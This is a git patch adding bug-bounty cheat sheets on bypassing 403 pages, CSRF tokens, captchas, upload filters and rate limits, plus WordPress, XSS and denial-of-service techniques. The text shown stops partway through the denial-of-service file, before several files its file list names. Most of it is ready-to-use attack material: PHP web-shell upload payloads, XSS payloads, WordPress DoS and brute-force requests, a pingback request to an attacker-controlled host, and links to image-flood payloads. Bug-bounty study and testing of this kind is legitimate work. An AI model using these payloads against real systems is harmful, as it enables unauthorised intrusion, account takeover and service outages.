From f0de94d534cf1027d19bd03f755cc09dd426f2af Mon Sep 17 00:00:00 2001
From: BaCde <glacier@insight-labs.org>
Date: Mon, 1 Feb 2021 00:01:05 +0800
Subject: [PATCH] =?UTF-8?q?=E5=A2=9E=E5=8A=A0AllAboutBugBounty=E9=A1=B9?=
 =?UTF-8?q?=E7=9B=AE=E7=9A=84=E6=96=87=E6=A1=A3?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .../AllAboutBugBounty/Account Takeover.md     |  20 ++
 BugBounty/AllAboutBugBounty/Bypass 403.md     |  54 ++++
 BugBounty/AllAboutBugBounty/Bypass CSRF.md    | 119 ++++++++
 BugBounty/AllAboutBugBounty/Bypass Captcha.md |  59 ++++
 .../AllAboutBugBounty/Bypass File Upload.md   |  83 ++++++
 .../AllAboutBugBounty/Bypass Rate Limit.md    |  81 ++++++
 BugBounty/AllAboutBugBounty/CMS/WordPress.md  |  69 +++++
 .../AllAboutBugBounty/Cross Site Scripting.md | 274 ++++++++++++++++++
 .../AllAboutBugBounty/Denial Of Service.md    |  64 ++++
 .../AllAboutBugBounty/Exposed Source Code.md  |  25 ++
 BugBounty/AllAboutBugBounty/Framework/Zend.MD |   3 +
 .../AllAboutBugBounty/Framework/laravel.md    |  26 ++
 .../Host Header Injection.md                  |  45 +++
 .../Insecure Direct Object References.md      | 112 +++++++
 .../AllAboutBugBounty/Password Reset Flaws.md |  88 ++++++
 README.md                                     |   6 +
 16 files changed, 1128 insertions(+)
 create mode 100644 BugBounty/AllAboutBugBounty/Account Takeover.md
 create mode 100644 BugBounty/AllAboutBugBounty/Bypass 403.md
 create mode 100644 BugBounty/AllAboutBugBounty/Bypass CSRF.md
 create mode 100644 BugBounty/AllAboutBugBounty/Bypass Captcha.md
 create mode 100644 BugBounty/AllAboutBugBounty/Bypass File Upload.md
 create mode 100644 BugBounty/AllAboutBugBounty/Bypass Rate Limit.md
 create mode 100644 BugBounty/AllAboutBugBounty/CMS/WordPress.md
 create mode 100644 BugBounty/AllAboutBugBounty/Cross Site Scripting.md
 create mode 100644 BugBounty/AllAboutBugBounty/Denial Of Service.md
 create mode 100644 BugBounty/AllAboutBugBounty/Exposed Source Code.md
 create mode 100644 BugBounty/AllAboutBugBounty/Framework/Zend.MD
 create mode 100644 BugBounty/AllAboutBugBounty/Framework/laravel.md
 create mode 100644 BugBounty/AllAboutBugBounty/Host Header Injection.md
 create mode 100644 BugBounty/AllAboutBugBounty/Insecure Direct Object References.md
 create mode 100644 BugBounty/AllAboutBugBounty/Password Reset Flaws.md

diff --git a/BugBounty/AllAboutBugBounty/Account Takeover.md b/BugBounty/AllAboutBugBounty/Account Takeover.md
new file mode 100644
index 0000000..49447ea
--- /dev/null
+++ b/BugBounty/AllAboutBugBounty/Account Takeover.md	
@@ -0,0 +1,20 @@
+## Account Takeover
+
+1. Using OAuth Misconfiguration
+   - Victim has a account in evil.com
+   - Attacker creates an account on evil.com using OAuth. For example the attacker have a facebook with a registered victim email
+   - Attacker changed his/her email to victim email.
+   - When the victim try to create an account on evil.com, it says the email already exists.
+
+2. Try re-sign up using same email
+```
+POST /newaccount
+[...]
+email=victim@mail.com&password=1234
+```
+After sign up using victim email, try signup again but using different password
+```
+POST /newaccount
+[...]
+email=victim@mail.com&password=hacked
+```
\ No newline at end of file
diff --git a/BugBounty/AllAboutBugBounty/Bypass 403.md b/BugBounty/AllAboutBugBounty/Bypass 403.md
new file mode 100644
index 0000000..4b623f7
--- /dev/null
+++ b/BugBounty/AllAboutBugBounty/Bypass 403.md	
@@ -0,0 +1,54 @@
+# 403 Forbidden Bypass
+
+1. Using "X-Original-URL" header
+```
+GET /admin HTTP/1.1
+Host: target.com
+```
+Try this to bypass
+```
+GET /anything HTTP/1.1
+Host: target.com
+X-Original-URL: /admin
+```
+
+2. Appending **%2e** after the first slash
+```
+http://target.com/admin => 403
+```
+Try this to bypass
+```
+http://target.com/%2e/admin => 200
+```
+
+3. Try add dot (.) and slash (/) in the URL
+```
+http://target.com/admin => 403
+```
+Try this to bypass
+```
+http://target.com/admin/. => 200
+http://target.com//admin// => 200
+http://target.com/./admin/./ => 200
+```
+
+4. Add "..;/" after the directory name
+```
+http://target.com/admin
+```
+Try this to bypass
+```
+http://target.com/admin..;/
+```
+
+
+5. Try to uppercase the alphabet in the url
+```
+http://target.com/admin
+```
+Try this to bypass
+```
+http://target.com/aDmIN
+```
+
+Source: [@iam_j0ker](https://twitter.com/iam_j0ker)
diff --git a/BugBounty/AllAboutBugBounty/Bypass CSRF.md b/BugBounty/AllAboutBugBounty/Bypass CSRF.md
new file mode 100644
index 0000000..84b311f
--- /dev/null
+++ b/BugBounty/AllAboutBugBounty/Bypass CSRF.md	
@@ -0,0 +1,119 @@
+# Bypass CSRF Token
+1. Change single character
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
+```
+Try this to bypass
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab
+```
+
+2. Sending empty value of token
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
+```
+Try this to bypass
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=
+```
+
+3. Replace the token with same length
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=aaaaaa
+```
+Try this to bypass
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=aaabaa
+```
+4. Changing POST / GET method
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
+```
+Try this to bypass
+```
+GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1
+Host: target.com
+[...]
+```
+
+5. Remove the token from request
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
+```
+Try this to bypass
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456
+```
+
+6. Use another user's valid token
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=ANOTHER_VALID_TOKEN
+```
+
+7. Try to decrypt hash
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=MTIzNDU2
+```
+MTIzNDU2 => 123456 with base64
+
+8. Sometimes anti-CSRF token is composed by 2 parts, one of them remains static while the others one dynamic
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=vi802jg9f8akd9j123
+```
+When we register again, the request like this
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=vi802jg9f8akd9j124
+```
+If you notice "vi802jg9f8akd9j" part of the token remain same, you just need to send with only static part
diff --git a/BugBounty/AllAboutBugBounty/Bypass Captcha.md b/BugBounty/AllAboutBugBounty/Bypass Captcha.md
new file mode 100644
index 0000000..e55b84e
--- /dev/null
+++ b/BugBounty/AllAboutBugBounty/Bypass Captcha.md	
@@ -0,0 +1,59 @@
+# Bypass Captcha
+1. Try changing the request method, for example POST to GET
+```
+POST / HTTP 1.1
+Host: target.com
+[...]
+
+_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
+```
+
+Change the method to GET
+```
+GET /?_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 HTTP 1.1
+Host: target.com
+[...]
+```
+
+2. Try remove the value of the captcha parameter
+```
+POST / HTTP 1.1
+Host: target.com
+[...]
+
+_RequestVerificationToken=&_Username=daffa&_Password=test123
+```
+
+3. Try reuse old captcha token
+```
+POST / HTTP 1.1
+Host: target.com
+[...]
+
+_RequestVerificationToken=OLD_CAPTCHA_TOKEN&_Username=daffa&_Password=test123
+```
+
+4. Convert JSON data to normal request parameter
+```
+POST / HTTP 1.1
+Host: target.com
+[...]
+
+{"_RequestVerificationToken":"xxxxxxxxxxxxxx","_Username":"daffa","_Password":"test123"}
+```
+Convert to normal request
+```
+POST / HTTP 1.1
+Host: target.com
+[...]
+
+_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
+```
+
+5. Try custom header to bypass captcha
+```
+X-Originating-IP: 127.0.0.1
+X-Forwarded-For: 127.0.0.1
+X-Remote-IP: 127.0.0.1
+X-Remote-Addr: 127.0.0.1
+```
diff --git a/BugBounty/AllAboutBugBounty/Bypass File Upload.md b/BugBounty/AllAboutBugBounty/Bypass File Upload.md
new file mode 100644
index 0000000..57f6bd3
--- /dev/null
+++ b/BugBounty/AllAboutBugBounty/Bypass File Upload.md	
@@ -0,0 +1,83 @@
+# Bypass File Upload
+1. Change the ContentType
+```
+POST /images/upload/ HTTP/1.1
+Host: target.com
+[...]
+
+---------------------------829348923824
+Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
+Content-Type: application/x-php
+```
+Change the Content-Type
+```
+POST /images/upload/ HTTP/1.1
+Host: target.com
+[...]
+
+---------------------------829348923824
+Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
+Content-Type: image/jpeg
+```
+
+2. Try to change the extension when send the request, for example in here you cant upload file with ext php but you can upload jpg file
+```
+POST /images/upload/ HTTP/1.1
+Host: target.com
+[...]
+
+---------------------------829348923824
+Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg"
+Content-Type: application/x-php
+```
+Change the request to this
+```
+POST /images/upload/ HTTP/1.1
+Host: target.com
+[...]
+
+---------------------------829348923824
+Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
+Content-Type: application/x-php
+```
+
+3. Upload the payload, but start with GIF89a; and
+```
+POST /images/upload/ HTTP/1.1
+Host: target.com
+[...]
+
+---------------------------829348923824
+Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
+Content-Type: image/gif
+
+GIF89a; <?php system("id") ?>
+```
+And dont forget to change the content-type to image/gif
+
+4. Bypass content length validation, it can be bypassed using small payload
+```
+(<?=`$_GET[x]`?>)
+```
+
+5. Using null byte in filename
+```
+file.php%00.gif
+```
+
+6. Using double extensions for the uploaded file
+```
+file.jpg.php
+```
+
+7.  Uploading an unpopular php extensions (php4,php5,php6,phtml)
+```
+file.php5
+```
+
+8. Try to randomly capitalizes the file extension
+```
+file.pHP5
+```
+
+9. Mix the tips!
diff --git a/BugBounty/AllAboutBugBounty/Bypass Rate Limit.md b/BugBounty/AllAboutBugBounty/Bypass Rate Limit.md
new file mode 100644
index 0000000..403963d
--- /dev/null
+++ b/BugBounty/AllAboutBugBounty/Bypass Rate Limit.md	
@@ -0,0 +1,81 @@
+# Bypass Rate Limit
+1. Try add some custom header
+```
+X-Forwarded-For : 127.0.0.1
+X-Forwarded-Host : 127.0.0.1
+X-Client-IP : 127.0.0.1
+X-Remote-IP : 127.0.0.1
+X-Remote-Addr : 127.0.0.1
+X-Host : 127.0.0.1
+```
+For example:
+```
+POST /ForgotPass.php HTTP/1.1
+Host: target.com
+X-Forwarded-For : 127.0.0.1
+[...]
+
+email=victim@gmail.com
+```
+
+2. Adding Null Byte ( %00 ) or CRLF ( %09, %0d, %0a ) at the end of the Email can bypass rate limit.
+```
+POST /ForgotPass.php HTTP/1.1
+Host: target.com
+[...]
+
+email=victim@gmail.com%00
+```
+
+3. Try changing user-agents, cookies and IP address
+```
+POST /ForgotPass.php HTTP/1.1
+Host: target.com
+Cookie: xxxxxxxxxx
+[...]
+
+email=victim@gmail.com
+```
+Try this to bypass
+```
+POST /ForgotPass.php HTTP/1.1
+Host: target.com
+Cookie: aaaaaaaaaaaaa
+[...]
+
+email=victim@gmail.com
+```
+
+4. Add a random parameter on the last endpoint
+```
+POST /ForgotPass.php HTTP/1.1
+Host: target.com
+[...]
+
+email=victim@gmail.com
+```
+Try this to bypass
+```
+POST /ForgotPass.php?random HTTP/1.1
+Host: target.com
+[...]
+
+email=victim@gmail.com
+```
+
+5. Add space after the parameter value
+```
+POST /api/forgotpass HTTP/1.1
+Host: target.com
+[...]
+
+{"email":"victim@gmail.com"}
+```
+Try this to bypass
+```
+POST /api/forgotpass HTTP/1.1
+Host: target.com
+[...]
+
+{"email":"victim@gmail.com "}
+```
diff --git a/BugBounty/AllAboutBugBounty/CMS/WordPress.md b/BugBounty/AllAboutBugBounty/CMS/WordPress.md
new file mode 100644
index 0000000..d5f9d74
--- /dev/null
+++ b/BugBounty/AllAboutBugBounty/CMS/WordPress.md
@@ -0,0 +1,69 @@
+# WordPress Common Bugs
+
+1. Denial of Service via load-scripts.php
+```
+http://target.com/wp-admin/load-scripts.php?load=react,react-dom,moment,lodash,wp-polyfill-fetch,wp-polyfill-formdata,wp-polyfill-node-contains,wp-polyfill-url,wp-polyfill-dom-rect,wp-polyfill-element-closest,wp-polyfill,wp-block-library,wp-edit-post,wp-i18n,wp-hooks,wp-api-fetch,wp-data,wp-date,editor,colorpicker,media,wplink,link,utils,common,wp-sanitize,sack,quicktags,clipboard,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-reply,json2,underscore,backbone,wp-util,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrate,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,esprima,jshint,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-bar,wplink,wpdialogs,word-count,media-upload,hoverIntent,hoverintent-js,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embed,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,site-health,privacy-tools,updates,farbtastic,iris,wp-color-picker,dashboard,list-revisions,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter
+```
+
+2. Denial of Service via load-styles.php
+```
+http://target.com/wp-admin/load-styles.php?&load=common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,widgets,site-icon,l10n,install,wp-color-picker,customize-controls,customize-widgets,customize-nav-menus,customize-preview,ie,login,site-health,buttons,admin-bar,wp-auth-check,editor-buttons,media-views,wp-pointer,wp-jquery-ui-dialog,wp-block-library-theme,wp-edit-blocks,wp-block-editor,wp-block-library,wp-components,wp-edit-post,wp-editor,wp-format-library,wp-list-reusable-blocks,wp-nux,deprecated-media,farbtastic
+```
+
+3. Log files exposed
+```
+http://target.com/wp-content/debug.log
+```
+
+4. Backup file wp-config exposed
+```
+.wp-config.php.swp
+wp-config.inc
+wp-config.old
+wp-config.txt
+wp-config.html
+wp-config.php.bak
+wp-config.php.dist
+wp-config.php.inc
+wp-config.php.old
+wp-config.php.save
+wp-config.php.swp
+wp-config.php.txt
+wp-config.php.zip
+wp-config.php.html
+wp-config.php~
+```
+
+5. Information disclosure wordpress username
+```
+http://target.com/?author=1
+```
+```
+http://target.com/wp-json/wp/v2/users
+http://target.com/?rest_route=/wp/v2/users
+```
+
+6. Bruteforce in wp-login.php
+```
+POST /wp-login.php HTTP/1.1
+Host: target.com
+
+log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1
+```
+
+7. XSPA in wordpress
+```
+POST /xmlrpc.php HTTP/1.1
+Host: target.com
+
+<methodCall>
+<methodName>pingback.ping</methodName>
+<params><param>
+<value><string>http://yourip:port</string></value>
+</param><param>
+<value>
+<string>https://target.com></string>
+</value>
+</param></params>
+</methodCall>
+```
diff --git a/BugBounty/AllAboutBugBounty/Cross Site Scripting.md b/BugBounty/AllAboutBugBounty/Cross Site Scripting.md
new file mode 100644
index 0000000..c9202b4
--- /dev/null
+++ b/BugBounty/AllAboutBugBounty/Cross Site Scripting.md	
@@ -0,0 +1,274 @@
+# XSS Cheat Sheet (Basic)
+1. Basic payload
+```html
+<script>alert(1)</script>
+<svg/onload=alert(1)>
+<img src=x onerror=alert(1)>
+```
+
+2. Add ' or " to escape the payload from value of an HTML tag
+```html
+"><script>alert(1)</script>
+'><script>alert(1)</script> 
+```
+
+* Example source code
+```html
+<input id="keyword" type="text" name="q" value="REFLECTED_HERE">
+```
+
+* After input the payload
+```html
+<input id="keyword" type="text" name="q" value=""><script>alert(1)</script>
+```
+
+3. Add --> to escape the payload if input lands in HTML comments.
+```html
+--><script>alert(1)</script>
+```
+
+* Example source code
+```html
+<!-- REFLECTED_HERE --> 
+```
+
+* After input the payload
+```html
+<!-- --><script>alert(1)</script> -->
+```
+
+4. Add </tag> when the input inside or between opening/closing tags, tag can be <a>,<title,<script> and any other HTML tags
+    
+```html
+</tag><script>alert(1)</script>
+"></tag><script>alert(1)</script>
+```
+
+* Example source code
+```html
+<a href="https://target.com/1?status=REFLECTED_HERE">1</a>
+```
+
+* After input the payload
+```html
+<a href="https://target.com/1?status="></a><script>alert(1)</script>">1</a>
+```
+
+5. Use when input inside an attribute’s value of an HTML tag but > is filtered
+```html
+" onmouseover=alert(1)
+" autofocus onfocus=alert(1)
+```
+
+* Example source code
+```html
+<input id="keyword" type="text" name="q" value="REFLECTED_HERE">
+```
+
+* After input the payload
+```html
+<input id="keyword" type="text" name="q" value="" onmouseover=alert(1)">
+```
+
+6. Use </script> when input inside <script> tags
+```html
+</script><script>alert(1)</script>
+```
+
+* Example source code
+```html
+<script>
+    var sitekey = 'REFLECTED_HERE';
+</script>
+```
+
+* After input the payload
+```html
+<script>
+    var sitekey = '</script><script>alert(1)</script>';
+</script>
+```
+
+# XSS Cheat Sheet (Advanced)
+7. Use when input lands in a script block, inside a string delimited value.
+```html
+'-alert(1)-'
+'/alert(1)//
+```
+
+* Example source code
+```html
+<script>
+    var sitekey = 'REFLECTED_HERE';
+</script>
+```
+
+* After input the payload
+```html
+<script>
+    var sitekey = ''-alert(1)-'';
+</script>
+```
+
+8. Same like Number 7. But inside a string delimited value but quotes are escaped by a backslash.
+```html
+\'alert(1)//
+```
+
+* Example source code
+```html
+<script>
+    var sitekey = 'REFLECTED_HERE';
+</script>
+```
+
+* If we input payload '-alert(1)-' it will be like this
+```html
+<script>
+    var sitekey = '\'-alert(1)-\'';
+</script>
+```
+The quotes are escaped by a backslash so we need to bypass them
+
+* After input the payload
+```html
+<script>
+    var sitekey = '\\'alert(1)//';
+</script>
+```
+
+9. Use when there’s multi reflection in the same line of JS code
+```html
+/alert(1)//\
+/alert(1)}//\
+```
+
+* Example source code
+```html
+<script>
+    var a = 'REFLECTED_HERE'; var b = 'REFLECTED_HERE';
+</script>
+```
+
+* After input the payload
+```html
+<script>
+    var a = '/alert(1)//\'; var b = '/alert(1)//\';
+</script>
+```
+
+10. Use when input inside a string delimited value and inside a single logical block like function or conditional (if, else, etc).
+```html
+'}alert(1);{'
+\'}alert(1);{// 
+```
+
+* Example source code
+```html
+<script>
+    var greeting;
+    var time = 1;
+    if (time < 10) {
+    test = 'REFLECTED_HERE';
+  }
+</script>
+```
+
+* After input the payload
+```html
+<script>
+    var test;
+    var time = 1;
+    if (time < 10) {
+    test = ''}alert(1);{'';
+  }
+</script>
+```
+
+> Payload number 2 uses when quote escaped by backslash
+
+11. Use when input lands inside backticks delimited strings
+```html
+${alert(1)}
+```
+
+* Example source code
+```html
+<script>
+    var dapos = `REFLECTED_HERE`;
+</script>
+```
+
+* After input the payload
+```html
+<script>
+    var dapos = `${alert(1)}`;
+</script>
+```
+
+12. Uses when there is multiple reflections on same page. (Double Reflection)
+```html
+'onload=alert(1)><svg/1='
+'>alert(1)</script><script/1='
+*/alert(1)</script><script>/*
+```
+
+* After input the payload
+```html
+<!DOCTYPE html>
+<html>
+<body>
+'onload=alert(1)><svg/1='
+[...]
+'onload=alert(1)><svg/1='
+</body>
+</html>
+```
+
+13. Uses when there is multiple reflections on same page. (Triple Reflection)
+```html
+*/alert(1)">'onload="/*<svg/1='
+`-alert(1)">'onload="`<svg/1='
+*/</script>'>alert(1)/*<script/1='
+```
+
+* After input the payload
+```html
+<!DOCTYPE html>
+<html>
+<body>
+*/alert(1)">'onload="/*<svg/1='
+[...]
+*/alert(1)">'onload="/*<svg/1='
+[...]
+*/alert(1)">'onload="/*<svg/1='
+</body>
+</html>
+```
+
+14. XSS in filename (File Upload) Use when uploaded filename is reflected somewhere in target page
+```
+"><svg onload=alert(1)>.jpeg
+```
+
+15. XSS in metadata (File Upload) Use when uploaded metada is reflected somewhere in target page (using exiftool)
+```
+$ exiftool -Artist='"><script>alert(1)</script>' dapos.jpeg
+```
+
+16. XSS with SVG file (File Upload)
+```
+<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>
+```
+
+17. XSS via markdown
+```
+[Click Me](javascript:alert('1'))
+```
+
+18. XSS in XML page
+```
+<a:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1)</a:script>
+```
+> Add a "-->" to payload if input lands in a comment section
+> Add a "]]>" if input lands in a CDATA section
diff --git a/BugBounty/AllAboutBugBounty/Denial Of Service.md b/BugBounty/AllAboutBugBounty/Denial Of Service.md
new file mode 100644
index 0000000..0467b98
--- /dev/null
+++ b/BugBounty/AllAboutBugBounty/Denial Of Service.md	
@@ -0,0 +1,64 @@
+# Denial of Service
+
+1. Cookie bomb
+```
+https://target.com/index.php?param1=xxxxxxxxxxxxxxxxxxxxxx
+```
+After input "xxxxxxxxxxxxxxxxxxxxxx" as a value of param1, check your cookies. If there is cookies the value is "xxxxxxxxxxxxxxxxxxxxxx" it means the website is vulnerable
+
+References: [Hackerone #105363](https://hackerone.com/reports/105363)
+
+2. Try input a very long payload to form. For example using very long password or using very long email
+```
+POST /Register
+[...]
+
+username=victim&password=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+```
+
+References: [Hackerone #840598](https://hackerone.com/reports/840598)
+
+3. Cache poisoning, can using header "X-Forwarded-Port" or "X-Forwarded-Host"
+```
+curl -H "X-Forwarded-Port: 123" https://target.com/index.php?poison=1
+```
+```
+curl -H "X-Forwarded-Host: target.com:123" https://target.com/index.php?poison=1
+```
+
+Reference: [Hackerone #409370](https://hackerone.com/reports/409370)
+
+4. Pixel flood, using image with a huge pixels
+
+Download the payload: [Here](https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/000/000/128/5f5a974e5f67ab7a11d2d92bd40f8997969f2f17/lottapixel.jpg?response-content-disposition=attachment%3B%20filename%3D%22lottapixel.jpg%22%3B%20filename%2A%3DUTF-8%27%27lottapixel.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQYFO7EZHL%2F20200910%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20200910T110133Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEFIaCXVzLXdlc3QtMiJGMEQCIGgY3dUtffr4V%2BoxTJaFxc%2F7qjRodT3XLyN1ZLEF8%2FhfAiAXklx1Zvy3iKIGm1bocpDUP1cTx46eTbsDOKqRC93fgyq0AwhbEAEaDDAxMzYxOTI3NDg0OSIMH9s8JiCh%2B%2FNADeibKpEDocuqfbmxkM5H5iKsA3K4RuwcxVT9ORLJrjJO%2FILAm%2BcNsQXTgId%2Bpw1KOLkbFKrq0BQIC6459JtfWqHPXvDC7ZJGboQ%2FXE0F%2BAZQa6jaEyldrkKuDewNy5jy3VX1gquS%2BWrGl%2BGhwmXB4cg1jgOugGUsC%2FxD%2BcragIJAtGA7lp3YdcL%2FiQbnvuzmLP8w%2FyCHPUrpOw94bPOk8fpetOJoLmDfXZdL3hLGBEUGS7dSOoyebLSXGZDctkSpnXCq383lWYWYn0LSv1ooVvuCVzgxE%2BZi4b4QvLjjMG3FJdEX%2BDYmnDvnSrRoDtyj8bD3cP3xbZ3jaNYRbIlQTm2zR1DgoaDGE74FmpZWHcyC8zK0V6AKG6OzkcIaGRnGdDNSpZkN0DrWE7uY6BLiIGY16rflYOaElnbxijoMNDsU3MZH8gGk7crYJ%2FCeHeayInPBDgiREBgn7orAIjOY3xg8vzwKO96a90LmkK7wk977TbKfLIng1iNP9EMKYDjGePdBYDML9zBeqhO5LrVH%2BfbwzG5GXi0w5fnn%2BgU67AFRBwMChVRr%2FLW4j0PqpXUeN5ysVIuagoqSwqOhfwI9rtk56zTuGhO3du4raY5SOQ9vSkRdYHhga%2BW7oQTByD1ISiSaOjHs1s%2FrNfvIfMA8r0drPSykOdCuV2A5NhBpEPpT%2BuOosogdPihcORhO3hbcQJ9y4uxBsaBSJr%2F8S2CGjwZw7SOGmNaNFsPu%2BMRbYDA%2FH2eUMBl96w6KpUuNAXEPUcfq3weRMP1vXW62S4OyniYJ6DEVRkkE4eFZMUqy4c94uwSAegK54Po0V0sPM%2FncTESCgBf7Qe2zZlPhdRGZR%2F25cF6JTH0t2VIRQw%3D%3D&X-Amz-Signature=a837cb6b26bf437fa5008695310a21788918081c36e745d286c5cba9fd4a78e0)
+
+References: [Hackerone #390] (https://hackerone.com/reports/390)
+
+5. Frame flood, using GIF with a huge frame
+
+Download the payload: [Here](https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/000/000/136/902000ac102f14a36a4d83ed9b5c293017b77fc7/uber.gif?response-content-disposition=attachment%3B%20filename%3D%22uber.gif%22%3B%20filename%2A%3DUTF-8%27%27uber.gif&response-content-type=image%2Fgif&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQ245MJJPA%2F20200910%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20200910T110848Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEFMaCXVzLXdlc3QtMiJHMEUCIEC768ifpRHeEUucuNuVL%2FdcSsWMnGeNp%2FMhKs6afB01AiEAiZOP%2FwMaeQMITUni3aFcACIOqOHnWHgLKuXHRrb5LooqtAMIXBABGgwwMTM2MTkyNzQ4NDkiDHHy9PJ2ccl9cmsvyCqRA6bliBHBMPXR6NYflM%2BCXCCQ5VLdPCATpmLs9DhVuYsjxR3JUtVHnBvtfEYYWDWWsLoC3xuzmug5ycrAvqK%2BTYDYO7l4HD1rXfyEBkR579ZlUFab6bOL4i8nDqblun%2FeV253Sgd6GzL4E%2FXmUN%2FC6qNydSd9hp2fLoyNjqob6o5zJjmnqvZsq50ROOZwf1idkDtr163qeVZERnan7aY9rM%2FsX4iVdE4wY0rLw1maGRuDF2aLVCxPB681htsHt%2FpoZ18QY7LjcbNjbjB4PgXLd1sm5zQ4q9mPVxTZPvzo9BJCh7l6kMLHCtJXOXfrvvN8UBgIqr1KXvodzv7FRQYcvEpfw4pwCTWzBs8VeEcwS9gjOXFMNLNI8SZ9V76VQ5KrOIpKhzM9UQQN3DVzY3SwMHydX%2B%2BYcQTt%2FjvqTkorsltqob2g5E1K0U8btRLBvBqOo0Vbr75zLcLUUomDBQzSNSvJgTN43huYmkZxBpWAAId72Tt6m56aFQLXkCKGSoMxYjrrVW9jc37pVl3lZU7FIX0AMIuN6PoFOusBpDCrjFwR1Y7t7W8wLapYjI6yOkkvWTFwWvx38jZl9okqo5xchKolmKxKX7cfGPIyuUmSXc1xa0nKwYeOYlhQZfyI0NobqyWW81ITuuUjsBxULuqrXqfVl0PTjTTpqe%2FHvU6wYSE358XfggtcqaH9PPgNDOejgv%2FLnh9AH9nyqIWuaCu865IfAOupVVzFzQilyB2LDyQtTS4Kp5dHyEAibRQlqeKHWOkUE2mQefAaTxKLRKrs0mJQYSuC%2B4LQEB3Cq9Nhj5HN%2BYT7A7CDLrvyChyfYXQZYr0lR1jN91Yd7SBe2jB1Qls%2Bx%2FEUlQ%3D%3D&X-Amz-Signature=910a3812cf3b69f6fa72f39a89a6df2f395f8d17ef8702eeb164a0477c64fff5)
+
+References: [Hackerone #400] (https://hackerone.com/reports/400)
+
+**Rare cases**
